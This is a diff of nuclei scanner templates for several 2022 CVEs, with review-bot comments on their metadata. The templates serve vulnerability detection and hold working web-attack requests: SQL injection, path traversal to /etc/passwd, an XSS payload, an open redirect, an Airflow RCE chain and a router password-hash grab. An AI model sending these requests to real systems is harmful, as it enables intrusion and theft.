4a0a004730450220057b8339ddb6abf7f302c0ce2930970721d2d74cb1e5c01ae73ecf452fda2bbd022100d74919fcc4b6c6068fca4cfffb9cea7431d1d7f97f3562e58bec9ab05be96d0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe7ff33760e6216455b976917c3895164eff5585432a53158db6e362b5c59bc702203d624f6051dbcc168fdd190e57fed04454c628d0500d5dffb611d8b5ec17e4ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40083.yaml b/nuclei-templates/CVE-2022/CVE-2022-40083.yaml index 99d53eff29..160bffd6a4 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40083.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40083.yaml 
@@ -6,31 +6,42 @@ info:
 severity: critical
 description: |
 Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
+ impact: |
+ Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,.
 remediation: Download and install 4.9.0, which contains a patch for this issue.
 reference:
 - https://github.com/labstack/echo/issues/2259
 - https://nvd.nist.gov/vuln/detail/CVE-2022-40083
+ - https://github.com/ARPSyndicate/cvemon
+ - https://github.com/ARPSyndicate/kenzer-templates
+ - https://github.com/Henry4E36/POCS
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
 cvss-score: 9.6
 cve-id: CVE-2022-40083
 cwe-id: CWE-601
+ epss-score: 0.0212
+ epss-percentile: 0.88046
+ cpe: cpe:2.3:a:labstack:echo:4.8.0:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: labstack
+ product: echo
 tags: cve,cve2022,redirect,labstack
-requests:
+http:
 - method: GET
 path:
 - "{{BaseURL}}//interactsh.com%2f.."
 matchers-condition: and
 matchers:
- - type: word
+ - type: regex
 part: location
- words:
- - '//interactsh.com/../'
+ regex:
+ - '^\s*//interactsh.com/\.\.'
 - type: status
 status:
 - 301
-
-# Enhanced by md on 2022/10/18
+# digest: 4b0a00483046022100fded3edccd5f1179bdb2580cb9d18c97d3dab9ced013e1e822c48bd48ccfb195022100b207d6a21963237237bf2129669404f2fb7e5100b1ae87859f861bbac456db4b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-40127.yaml b/nuclei-templates/CVE-2022/CVE-2022-40127.yaml
index f08ebebe5e..2ab8306634 100644
--- a/nuclei-templates/CVE-2022/CVE-2022-40127.yaml
+++ b/nuclei-templates/CVE-2022/CVE-2022-40127.yaml
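Review bot: The added impact line ends in `credential theft,.`, a dangling comma before the full stop; suggest `Successful exploitation of this vulnerability could lead to phishing attacks or credential theft.` In the new regex matcher, `'^\s*//interactsh.com/\.\.'` escapes the dots of `..` but not the one in `interactsh.com`, so `'^\s*//interactsh\.com/\.\.'` states the intent exactly. Switching from a bare word to an anchored regex on `location` is itself an improvement, since the old pattern also matched when the string appeared later inside a longer Location value.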
@@ -1,43 +1,53 @@
 id: CVE-2022-40127
 info:
- name: AirFlow < 2.4.0 - RCE
+ name: AirFlow < 2.4.0 - Remote Code Execution
 author: DhiyaneshDk,ritikchaddha
 severity: high
 description: |
 A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
+ remediation: |
+ Upgrade AirFlow to version 2.4.0 or later to mitigate this vulnerability.
 reference:
 - https://github.com/Mr-xn/CVE-2022-40127
 - https://nvd.nist.gov/vuln/detail/CVE-2022-40127
+ - http://www.openwall.com/lists/oss-security/2022/11/14/2
+ - https://github.com/apache/airflow/pull/25960
+ - https://lists.apache.org/thread/cf132hgm6jvzvsbpsozl3plf1r4cwysy
 classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
 cve-id: CVE-2022-40127
+ cwe-id: CWE-94
+ epss-score: 0.28782
+ epss-percentile: 0.96752
+ cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
 metadata:
+ verified: true
+ max-request: 3
+ vendor: apache
+ product: airflow
 shodan-query: title:"Sign In - Airflow"
- tags: cve,cve2022,airflow,rce,oast
+ tags: cve,cve2022,airflow,rce,oast,authenticated,apache
-requests:
+http:
 - raw:
 - |
 GET /login/ HTTP/1.1
 Host: {{Hostname}}
- Origin: {{BaseURL}}
-
 - |
 POST /login/ HTTP/1.1
 Host: {{Hostname}}
- Origin: {{BaseURL}}
 Content-Type: application/x-www-form-urlencoded
- Referer: {{BaseURL}}/admin/airflow/login
 username={{username}}&password={{password}}&_csrf_token={{csrf_token}}
-
 - |
 @timeout: 15s
 POST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1
 Host: {{Hostname}}
- Accept: application/json
 Content-Type: application/json
- Origin: {{BaseURL}}
 {
 "conf": {
@@ -48,7 +58,6 @@ requests:
 }
- cookie-reuse: true
 matchers-condition: and
 matchers:
 - type: word
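Review bot: The `@@ -48,7 +58,6 @@` hunk drops `cookie-reuse: true`, yet the request chain still depends on the session cookie set by the `/login/` POST being sent with the later `/api/v1/dags/example_bash_operator/dagRuns` call. That only holds if the engine reuses cookies by default, which newer nuclei releases do (with `disable-cookie` as the opt-out) but older ones treated as opt-in, so a template that silently relies on it will report a clean miss on an old engine. A one-line comment above `http:` naming the minimum engine version, or a sentence in the commit description, would make the dependency explicit; the `authenticated` tag added in the first hunk is a good addition since the template takes `{{username}}` and `{{password}}`.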
@@ -56,6 +65,11 @@ requests: words: - 'state": "queued"' + - type: word + part: interactsh_protocol + words: + - dns + - type: status status: - 200 @@ -64,6 +78,7 @@ requests: - type: regex name: csrf_token group: 1 - internal: true regex: - 'type="hidden" value="(.*?)">' + internal: true +# digest: 4a0a004730450220268a6975a87f86a812533542ac7994169de5175872889d429254a91734af5044022100b472c5440cfea767aec326fbd15a942a4d35efcd9f11e527f167068308b38d39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40359.yaml b/nuclei-templates/CVE-2022/CVE-2022-40359.yaml index 57167dc921..e5c85bfa5c 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40359.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40359.yaml 
@@ -6,20 +6,32 @@ info:
 severity: medium
 description: |
 Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
+ remediation: |
+ Upgrade to the latest version of Kae's File Manager plugin (1.4.7) or apply the vendor-provided patch to mitigate the XSS vulnerability.
 reference:
 - https://cxsecurity.com/issue/WLB-2022090057
 - https://code.google.com/archive/p/kfm/downloads
 - https://nvd.nist.gov/vuln/detail/CVE-2022-40359
+ - https://github.com/ARPSyndicate/cvemon
+ - https://github.com/ARPSyndicate/kenzer-templates
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
 cvss-score: 6.1
 cve-id: CVE-2022-40359
 cwe-id: CWE-79
+ epss-score: 0.00129
+ epss-percentile: 0.46796
+ cpe: cpe:2.3:a:kfm_project:kfm:*:*:*:*:*:*:*:*
 metadata:
- verified: "true"
- tags: cve,cve2022,xss,kfm
+ verified: true
+ max-request: 1
+ vendor: kfm_project
+ product: kfm
+ tags: cve,cve2022,xss,kfm,kfm_project
-requests:
+http:
 - raw:
 - |
 GET /kfm/index.php/' HTTP/1.1
@@ -43,5 +55,4 @@ requests:
 - type: status
 status:
 - 200
-
-# Enhanced by md on 2022/12/13
+# digest: 4a0a004730450220171d85e0f730e64868dee2a05909f6c686e599f48f3696442a181b69884cf50f022100c1f6c50e667cb2eb97f58eadec05e4db8a84fdda96907fa4c22f023609840b63:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/CVE-2022-4049.yaml b/nuclei-templates/CVE-2022/CVE-2022-4049.yaml
index f477f4b2c8..224eae8487 100644
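Review bot: The added remediation contradicts the description above it: `Upgrade to the latest version of Kae's File Manager plugin (1.4.7)` names 1.4.7, which the description says is affected ("through 1.4.7"), and it calls the software a plugin although the description and the `cpe:` line treat it as a standalone file manager. Suggest `Upgrade Kae's File Manager to a release later than 1.4.7, or apply the vendor-provided patch, to mitigate the XSS vulnerability.` The `verified: "true"` to `verified: true` normalization in the same hunk is correct and consistent with the other templates in this commit.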
--- a/nuclei-templates/CVE-2022/CVE-2022-4049.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4049.yaml @@ -10,13 +10,14 @@ info: - https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be - https://wordpress.org/plugins/wp-user/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4049 + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4049 cwe-id: CWE-89 - epss-score: 0.03843 - epss-percentile: 0.90945 + epss-score: 0.04217 + epss-percentile: 0.92045 cpe: cpe:2.3:a:wp_user_project:wp_user:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -25,7 +26,7 @@ info: product: wp_user framework: wordpress publicwww-query: /wp-content/plugins/wp-user/ - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project http: - raw: @@ -64,4 +65,4 @@ http: regex: - '"wpuser_update_setting":"([0-9a-zA-Z]+)"' internal: true -# digest: 4a0a00473045022029d0c6fb080e7dc721729dbcbfca3106ca4808d6656dc19023565f6c8ba2190a022100808727523f33bb4df1cebb498db57e2de91e35129111b551e50aec5cccd559ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200bc446290576844df258d034022250c3aa6e8246bb5a19d65fa51e01ba5b35e4022100fc78eae46cc6546539a10fd2ec8828a404ac6f42e58cd5aed957844879de1ed6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4050.yaml b/nuclei-templates/CVE-2022/CVE-2022-4050.yaml index 66910ece9b..38f1381f3f 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4050.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4050.yaml 
@@ -6,20 +6,33 @@ info: severity: critical description: | WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. + remediation: | + Update to JoomSport plugin version 5.2.8 or later. reference: - https://wpscan.com/vulnerability/5c96bb40-4c2d-4e91-8339-e0ddce25912f - https://wordpress.org/plugins/joomsport-sports-league-results-management/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4050 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4050 cwe-id: CWE-89 + epss-score: 0.04713 + epss-percentile: 0.9246 + cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wpscan,cve,cve2022,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth + verified: true + max-request: 1 + vendor: beardev + product: joomsport + framework: wordpress + tags: cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev -requests: +http: - raw: - | @timeout: 15s 
@@ -27,15 +40,14 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-"} + mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(7))aaaa);--+-"} matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=7' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")' condition: and - -# Enhanced by md on 2023/01/06 +# digest: 4b0a00483046022100adc5764e0fcc369d16e68be00829b99d4fd95b2241bff1c6ef38c1a561fd9c1c0221008f5d90efe26e0150b8ed5e151209c27ebe6766cc9e70d08983c5696822fa55ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4057.yaml b/nuclei-templates/CVE-2022/CVE-2022-4057.yaml index 8c48e06f99..9cc0272f1e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4057.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4057.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs. + impact: | + An attacker can gain access to sensitive information, potentially leading to further attacks. remediation: | Upgrade to Autoptimize version 3.1.0 or later to fix the information disclosure vulnerability. reference: @@ -17,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-4057 cwe-id: CWE-425 - epss-score: 0.00177 - epss-percentile: 0.54814 + epss-score: 0.00125 + epss-percentile: 0.46949 cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: product: autooptimize framework: wordpress publicwww-query: /wp-content/plugins/autoptimize - tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,disclosure,autoptimize + tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters http: - method: GET 
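Review bot: `duration>=7` now equals the injected `SLEEP(7)`, which is correct for a lower bound, but the matcher still has no baseline request, so a target that is merely slow (any 200 response over 7 s carrying the `jscaruselcont jsview2` marker) is reported as injectable, and the longer sleep also lengthens the stall on every host scanned. A control request with `SLEEP(0)` and an otherwise identical body, compared in DSL the way other templates in this patch use indexed variables, e.g. `duration_2 - duration_1 >= 6` with the control sent first, would make the signal robust to latency. If single-request timing checks are the repository convention, at least record why 7 replaced 4 in a comment, e.g. `# SLEEP(7): 4 s gave false negatives on slow hosts`, because nothing in the commit explains the change. The POST line of this request sits in the preceding hunk.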
@@ -49,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f3f2a1e5217594672b14878cf8197821a12abb32ee31e82285b0fc9c39ccb30802201b09b968d28e8b6678a2f2c7705b3c6867e7cb39e108070053d6f1169a5c995e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a0bf6688a368fac230bd01722ccc5ff4a0094c997d4bc9e929424d1b2811d3d6022100dbac1fd1415a66ee1b95e9b5ae6303e3cb1fed954b0b80af47c8665c3c6db65a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4059.yaml b/nuclei-templates/CVE-2022/CVE-2022-4059.yaml index 2981f83c31..4047f7f53e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4059.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4059.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4059 cwe-id: CWE-89 - epss-score: 0.01682 - epss-percentile: 0.86284 + epss-score: 0.01515 + epss-percentile: 0.85653 cpe: cpe:2.3:a:blocksera:cryptocurrency_widgets_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: product: cryptocurrency_widgets_pack framework: wordpress publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/ - tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli + tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera http: - raw: @@ -45,4 +45,4 @@ http: - 'status_code_1 == 302' - 'contains(body_2, "Cryptocurrency Widgets Pack")' condition: and -# digest: 4b0a00483046022100af45cb5a2574fd08cf833ede073b84bea80c04170b796455af72df512ecc337b0221008dce0953d43efc63eb9a1e459fc6a64ce8ecc747efd7b57e049a795570035d54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec787a041969c87a9d0dfe9246ba9dbae1cdddae1fab53af91e2d39f501e35f1022005e07d6858416eed4f65ee7c5b6d8edf6a2538f6550466bd97a1ed559d5fad70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2022/CVE-2022-4060.yaml b/nuclei-templates/CVE-2022/CVE-2022-4060.yaml index c06ca2014a..1e005b5d4a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4060.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4060.yaml @@ -6,19 +6,23 @@ info: severity: critical description: | WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. remediation: | Update to the latest version of the User Post Gallery plugin (>=2.20) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/8f982ebd-6fc5-452d-8280-42e027d01b1e - https://wordpress.org/plugins/wp-upg/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4060 + - https://github.com/im-hanzou/UPGer + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4060 cwe-id: CWE-94 - epss-score: 0.02055 - epss-percentile: 0.87761 + epss-score: 0.03753 + epss-percentile: 0.91618 cpe: cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +30,7 @@ info: vendor: odude product: user_post_gallery framework: wordpress - tags: unauth,wpscan,cve2022,rce,wordpress,wp-plugin,wp,cve,wp-upg + tags: cve,cve2022,unauth,wpscan,rce,wordpress,wp-plugin,wp,wp-upg,odude http: - method: GET 
@@ -53,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205f190efdf043f1fc8c3eb2fc03343809938496c9eb8a0367ed997b3c9e643a2e0220325f4d14ab1f6089fd4aa2ec882ec731c77f67fb76f895f5d4e753ee1bed54a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200654ec12187c127abd7ddbeaaa97db5da699aae212f58f56dbdd9b3c3592da7d02205785dd9471edbb3f65c8fc27fb262bbb41ca3ef683dd42409e9fa2622df41348:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4063.yaml b/nuclei-templates/CVE-2022/CVE-2022-4063.yaml index a087a1b3d4..892680e979 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4063.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4063.yaml @@ -6,18 +6,22 @@ info: severity: critical description: | WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers. + impact: | + The vulnerability allows an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code. remediation: Fixed in version 2.1.4.1. reference: - https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7 - https://wordpress.org/plugins/inpost-gallery/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4063 + - https://github.com/cyllective/CVEs + - https://github.com/im-hanzou/INPGer classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4063 cwe-id: CWE-22 - epss-score: 0.02354 - epss-percentile: 0.88623 + epss-score: 0.04425 + epss-percentile: 0.92213 cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -25,7 +29,7 @@ info: vendor: pluginus product: inpost_gallery framework: wordpress - tags: cve,wp-plugin,wp,inpost-gallery,cve2022,lfi,wordpress,unauth,wpscan + tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus http: - method: GET @@ -47,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d17f66aa35a75f98c207d8b41e4ec79b96d5c58abdf1597bbf8559946df80f00022040a6e246df383c509a146275b4c5b8f2db62e91ef1256c74cf24ba6bc9ffaa15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001c30dda208f23934117d6648b68a7cbc6063bd9487648f9d3cb3f954c8fb469022100eb1c85cee64fa01d404510e98f5b9c0975e3511b85a8e515435a7dce0084aef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40734.yaml b/nuclei-templates/CVE-2022/CVE-2022-40734.yaml index 4f3eabdbb6..12eece546a 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40734.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40734.yaml 
@@ -6,20 +6,32 @@ info: severity: medium description: | Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution. + remediation: | + Upgrade to a patched version of Laravel Filemanager v2.5.1 or apply the recommended security patches provided by the vendor. reference: - https://github.com/UniSharp/laravel-filemanager/issues/1150 - https://nvd.nist.gov/vuln/detail/CVE-2022-40734 + - https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966 + - https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2022-40734 cwe-id: CWE-22 + epss-score: 0.01632 + epss-percentile: 0.86143 + cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: unisharp + product: laravel_filemanager shodan-query: http.html:"Laravel Filemanager" - verified: "true" tags: cve,cve2022,laravel,unisharp,lfi,traversal -requests: +http: - method: GET path: - "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd" @@ -30,5 +42,4 @@ requests: - type: regex regex: - "root:[x*]:0:0" - -# Enhanced by mp on 2023/01/15 +# digest: 4a0a00473045022100e98a87c4d16d7f1e1f4e3bd878e6b85448431976ad3ab893d2ce311bfbe051b002203da7fdd5c7a3b5bb0627aa18f2b5a7366a66ad2b2de1a34d774c059b20bd28d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40843.yaml b/nuclei-templates/CVE-2022/CVE-2022-40843.yaml index dcf2f460a7..5cff18afee 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40843.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40843.yaml 
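Review bot: The new remediation describes v2.5.1 as a patched version, while the description in the same hunk says the project is vulnerable through 2.5.1, so the two statements contradict each other. The two issue-comment links added to reference may identify the fix, but nothing in this hunk does, so I would write `remediation: | Upgrade to a release later than 2.5.1 that fixes the working_dir traversal, or restrict access to the download route.` The vector keeps PR:L while the GET below is sent without any session, so on deployments where the route requires login the template will quietly return false negatives; a `# NOTE: endpoint is authenticated on most deployments, unauthenticated hit verified on a default install` comment (or whichever case was actually verified) would save the next reader a guess. The http section continues past this hunk.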
@@ -3,22 +3,31 @@ id: CVE-2022-40843 info: name: Tenda AC1200 V-W15Ev2 - Authentication Bypass author: gy741 - severity: critical + severity: medium description: | The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential access to sensitive information. + remediation: | + Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability. reference: - https://boschko.ca/tenda_ac1200_router - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L - cvss-score: 9.9 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 cve-id: CVE-2022-40843 cwe-id: CWE-287 + epss-score: 0.40937 + epss-percentile: 0.97197 + cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\(1576\):*:*:*:*:*:*:* metadata: max-request: 1 - tags: cve,cve2022,tenda,auth-bypass,router,iot + vendor: tenda + product: w15e_firmware + tags: cve2022,cve,tenda,auth-bypass,router,iot -requests: +http: - raw: - | GET /goform/downloadSyslog/syslog.log HTTP/1.1 
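Review bot: The rescored vector `PR:H/S:U/C:H/I:N/A:N` (4.9, medium) contradicts the description retained in the same hunk, which says unauthenticated attackers can read the file holding the administrator's MD5 password, and the added impact text, which promises configuration changes and network compromise although the new vector rates integrity and availability as N. If the downgrade follows the NVD scoring, say so beside the metrics, e.g. `# classification follows NVD; the original report rates this an unauthenticated bypass`, and trim impact to what the template demonstrates: `impact: | An unauthenticated request retrieves the router's syslog, which contains the administrator's MD5 password hash.` Otherwise the severity should stay as it was. The remediation names no fixed firmware while the cpe pins 15.11.0.10(1576) as affected; cite the fixed build if one exists. The raw request continues past this hunk.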
@@ -47,3 +56,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100d2aad06ddab3ccd6e666e1cc53a8974249101d2a25b364fb4b96543189e71c450220673c9fddd115564cbbe4faa07d9de703be2cd6af8eede2a57e4408e9ba10d5af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-40879.yaml b/nuclei-templates/CVE-2022/CVE-2022-40879.yaml index 13bd42c2a8..0132443048 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-40879.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-40879.yaml 
@@ -2,24 +2,37 @@ id: CVE-2022-40879 info: name: kkFileView 4.1.0 - Cross-Site Scripting - author: arafatansari + author: arafatansari,co5mos severity: medium description: | kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of kkFileView or apply the necessary security patches to mitigate the XSS vulnerability. reference: - https://github.com/kekingcn/kkFileView/issues/389 - https://nvd.nist.gov/vuln/detail/CVE-2022-40879 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 - cve-id: CVE-2022-29349 + cve-id: CVE-2022-40879 cwe-id: CWE-79 + epss-score: 0.03708 + epss-percentile: 0.91567 + cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true + max-request: 1 + vendor: keking + product: kkfileview shodan-query: http.html:"kkFileView" - tags: cve,cve2022,kkFileView,xss + tags: cve,cve2022,kkFileView,xss,keking -requests: +http: - method: GET path: - "{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ==" 
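Review bot: The new remediation says "upgrade to a patched version" without naming one, while the cpe pins 4.1.0 and the only upstream reference is kekingcn issue #389; if that issue records a fix release or commit, cite it, e.g. `remediation: | Upgrade to the kkFileView release that resolves issue #389 (see reference), or HTML-encode errorMsg before it is rendered.` If no fix has been published, state that plainly instead of implying one. The cve-id correction in this hunk is the right fix and needs no further change; the matchers for this request are outside the hunk.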
